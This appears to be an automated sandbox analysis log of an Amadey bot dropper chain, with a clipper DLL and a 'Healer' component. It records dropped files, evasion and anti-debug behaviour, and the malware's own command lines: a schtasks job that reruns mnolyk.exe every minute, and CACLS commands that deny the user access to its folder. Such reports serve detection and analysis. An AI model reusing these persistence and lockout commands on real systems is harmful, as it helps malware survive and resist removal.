Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Process created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y\|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:R" /E	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:N"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:R" /E	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00071F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,		0_2_00071F90
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe	Code function: 1_2_01081F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,		1_2_01081F90

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

0_2_0007597D

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe

Code function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,

2_2_004019F0

Source: unknown

Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4968:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2332:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Mutant created: \Sessions\1\BaseNamedObjects\c1ec479e5342a25940592acf24703eb2

Source: C:\Users\user\Desktop\file.exe	Command line argument: Kernel32.dll	0_2_00072BFB
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe	Command line argument: Kernel32.dll	1_2_01082BFB
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Command line argument: 08A	2_2_00413780

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wextract.pdb source: file.exe, bKug.exe.0.dr
Source:	Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: file.exe, 00000000.00000003.299202495.0000000004AE7000.00000004.00000020.00020000.00000000.sdmp, xriv.exe, 00000006.00000000.363577848.00000000008EE000.00000002.00000001.01000000.00000009.sdmp, xriv.exe, 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmp, mnolyk.exe, 00000007.00000002.822994493.0000000000AFE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000007.00000000.365129064.0000000000AFE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000012.00000002.375077518.0000000000AFE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000012.00000000.370020877.0000000000AFE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000019.00000002.494152388.0000000000AFE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000019.00000000.493611540.0000000000AFE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001B.00000000.619977727.0000000000AFE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001B.00000002.620319914.0000000000AFE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001D.00000000.748590651.0000000000AFE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001D.00000002.755553344.0000000000AFE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe.6.dr, xriv.exe.0.dr
Source:	Binary string: Healer.pdb source: aKuf.exe, 00000002.00000002.338408809.0000000002390000.00000004.08000000.00040000.00000000.sdmp, aKuf.exe, 00000002.00000002.338220630.00000000008C0000.00000004.08000000.00040000.00000000.sdmp, aKuf.exe, 00000002.00000002.338462611.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, aKuf.exe, 00000002.00000002.338356597.0000000002280000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wextract.pdbGCTL source: file.exe, bKug.exe.0.dr
Source:	Binary string: =cC:\mologoz-wavilowive.pdb source: bKug.exe, 00000001.00000003.299884970.0000000004A4A000.00000004.00000020.00020000.00000000.sdmp, aKuf.exe, 00000002.00000000.300060819.0000000000401000.00000020.00000001.01000000.00000005.sdmp, aKuf.exe.1.dr
Source:	Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: bKug.exe, 00000001.00000003.299884970.0000000004A87000.00000004.00000020.00020000.00000000.sdmp, nika.exe, 00000004.00000000.339039470.00000000004E2000.00000002.00000001.01000000.00000008.sdmp, nika.exe.1.dr
Source:	Binary string: _.pdb source: aKuf.exe, 00000002.00000002.338220630.00000000008C0000.00000004.08000000.00040000.00000000.sdmp, aKuf.exe, 00000002.00000002.338462611.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, aKuf.exe, 00000002.00000002.338356597.0000000002280000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\Mktmp\Amadey\ClipperDLL\Release\CLIPPERDLL.pdb source: mnolyk.exe, 00000007.00000002.823055961.0000000000E4C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.823015828.000000006E7CF000.00000002.00000001.01000000.0000000C.sdmp, clip64.dll.7.dr, clip64[1].dll.7.dr
Source:	Binary string: Healer.pdbH5 source: aKuf.exe, 00000002.00000002.338408809.0000000002390000.00000004.08000000.00040000.00000000.sdmp, aKuf.exe, 00000002.00000002.338220630.00000000008C0000.00000004.08000000.00040000.00000000.sdmp, aKuf.exe, 00000002.00000002.338462611.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, aKuf.exe, 00000002.00000002.338356597.0000000002280000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\mologoz-wavilowive.pdb source: bKug.exe, 00000001.00000003.299884970.0000000004A4A000.00000004.00000020.00020000.00000000.sdmp, aKuf.exe, 00000002.00000000.300060819.0000000000401000.00000020.00000001.01000000.00000005.sdmp, aKuf.exe.1.dr

Data Obfuscation

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe

Unpacked PE file: 2.2.aKuf.exe.400000.0.unpack

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe

Unpacked PE file: 2.2.aKuf.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0007724D push ecx; ret	0_2_00077260
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe	Code function: 1_2_0108724D push ecx; ret	1_2_01087260
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_0041C40C push cs; iretd	2_2_0041C4E2
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_00423149 push eax; ret	2_2_00423179
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_0041C50E push cs; iretd	2_2_0041C4E2
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_004231C8 push eax; ret	2_2_00423179
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_0040E21D push ecx; ret	2_2_0040E230
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_0041C6BE push ebx; ret	2_2_0041C6BF
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_0059C125 push ebx; ret	2_2_0059C126
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_0058E484 push ecx; ret	2_2_0058E497
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_0059BE73 push cs; iretd	2_2_0059BF49
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_0059BF75 push cs; iretd	2_2_0059BF49
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_02134139 push edi; iretd	2_2_0213414E
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_0213454E push ecx; retf	2_2_02134554
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Code function: 6_2_008CF748 push E8FFFFFBh; iretd	6_2_008CF74D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Code function: 6_2_008D7D26 push ecx; ret	6_2_008D7D39

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00072F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,

0_2_00072F1D

Source: nika.exe.1.dr

Static PE information: 0xE382D401 [Fri Dec 15 06:19:45 2090 UTC]

Persistence and Installation Behavior

Yara detected Amadey bot

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000007.00000002.823055961.0000000000E4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.823055961.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.823055961.0000000000DBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mnolyk.exe PID: 2328, type: MEMORYSTR

Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	File created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\clip64[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	File created: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe	File created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe	File created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00071AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,		0_2_00071AE8
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe	Code function: 1_2_01081AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,		1_2_01081AE8

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F

Creates an undocumented autostart registry key

Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe TID: 4636	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe TID: 1244	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 5288	Thread sleep count: 65 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 5288	Thread sleep time: -1950000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 4392	Thread sleep time: -50000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 4776	Thread sleep count: 51 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 4776	Thread sleep time: -9180000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 4644	Thread sleep count: 47 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 5288	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5068	Thread sleep count: 193 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5068	Thread sleep time: -193000s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe

2_2_004019F0

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess			graph_2-26025
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep			graph_2-25938

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Thread delayed: delay time: 180000	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes			graph_1-2575
Source: C:\Users\user\Desktop\file.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes			graph_0-2575

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe

API coverage: 6.0 %

Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\clip64[1].dll

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Thread delayed: delay time: 50000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Thread delayed: delay time: 30000	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe

API call chain: ExitProcess graph end node

graph_2-26027

Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E4C000.00000004.00000020.00020000.00000000.sdmp, mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWh

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00075467 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,

0_2_00075467

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00072390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	0_2_00072390
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe	Code function: 1_2_01082390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	1_2_01082390
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Code function: 6_2_008DFC58 FindFirstFileExW,	6_2_008DFC58

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe

2_2_004019F0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00072F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,

0_2_00072F1D

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_0058092B mov eax, dword ptr fs:[00000030h]	2_2_0058092B
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_00580D90 mov eax, dword ptr fs:[00000030h]	2_2_00580D90
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Code function: 6_2_008DA9A1 mov eax, dword ptr fs:[00000030h]	6_2_008DA9A1
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Code function: 6_2_008DCFB2 mov eax, dword ptr fs:[00000030h]	6_2_008DCFB2

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe

Code function: 2_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

2_2_0040CE09

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe

Code function: 2_2_0040ADB0 GetProcessHeap,HeapFree,

2_2_0040ADB0

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00076F40 SetUnhandledExceptionFilter,	0_2_00076F40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00076CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00076CF0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe	Code function: 1_2_01086F40 SetUnhandledExceptionFilter,	1_2_01086F40
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe	Code function: 1_2_01086CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_01086CF0
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_0040CE09
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_0040E61C
